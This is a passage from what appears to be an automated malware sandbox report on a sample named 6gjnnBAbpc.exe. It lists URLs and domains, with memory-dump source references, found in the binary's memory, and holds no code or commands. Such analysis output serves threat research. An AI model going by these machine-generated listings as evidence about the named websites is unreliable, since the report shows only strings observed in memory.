00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536954407.0000000008D6A000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306098000.0000000008D30000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/(
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/i
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.309367787.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.309367787.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/J
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/vK
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.pl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/de/EP
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/r
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/ryP
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.660484326.000000000461D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536954407.0000000008D6A000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/563209-4053062332-1002
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.412487374.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.400798443.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.412487374.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.400798443.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/$
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/ata
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378544449.0000000008D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668827436.0000000008D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411982759.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.400749587.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.400749587.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/55c1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.400749587.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/:
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/l
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/X
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/p-
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378196066.0000000008DC7000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/53321935-2125563209-4053062332-1002hOc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.306098000.0000000008D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.306098000.0000000008D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/3321935-2125563209-4053062332-1002$OW
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 